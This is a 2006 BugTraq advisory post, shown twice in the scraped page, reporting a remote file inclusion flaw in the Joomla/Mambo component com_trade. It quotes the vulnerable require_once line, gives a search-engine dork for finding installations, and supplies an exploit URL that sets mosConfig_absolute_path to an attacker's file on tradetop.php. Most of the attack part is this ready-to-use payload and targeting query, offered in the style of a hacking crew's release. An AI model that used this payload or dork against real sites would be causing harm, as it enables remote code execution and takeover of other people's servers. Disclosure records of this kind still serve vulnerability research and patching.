BugTraq
Back to list
|
Post reply
SolpotCrew Advisory #3 - com_trade Remote File Inclusion (mosConfig_absolute_path)
Jul 21 2006 10:36PM
mail sipplah com
#############################SolpotCrew Community################################
#
# com_trade Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-com_trade.txt
#
########################################################################
#########
#
#
# Bug Found By :Blue|Spy
#
# contact: mail (at) sipplah (dot) com [email concealed]
#
# Website : http://kunamgede.biz, http://blue-spy.com
#
########################################################################
########
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
########################################################################
#######
code from tradetop.php
require_once( $mosConfig_absolute_path."/components/com_trade/includes/trade/database.
php" );
Dork:
inurl:com_trade
exploit:
http://site.com/[path]//administrator/components/com_trade/includes/trad
e/tradetop.php?mosConfig_absolute_path=[attacker]
##############################MY LOVE JUST FOR U LIENA#########################
########################################################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# com_trade Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-com_trade.txt
#
########################################################################
#########
#
#
# Bug Found By :Blue|Spy
#
# contact: mail (at) sipplah (dot) com [email concealed]
#
# Website : http://kunamgede.biz, http://blue-spy.com
#
########################################################################
########
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
########################################################################
#######
code from tradetop.php
require_once( $mosConfig_absolute_path."/components/com_trade/includes/trade/database.
php" );
Dork:
inurl:com_trade
exploit:
http://site.com/[path]//administrator/components/com_trade/includes/trad
e/tradetop.php?mosConfig_absolute_path=[attacker]
##############################MY LOVE JUST FOR U LIENA#########################
########################################################################
[ reply ]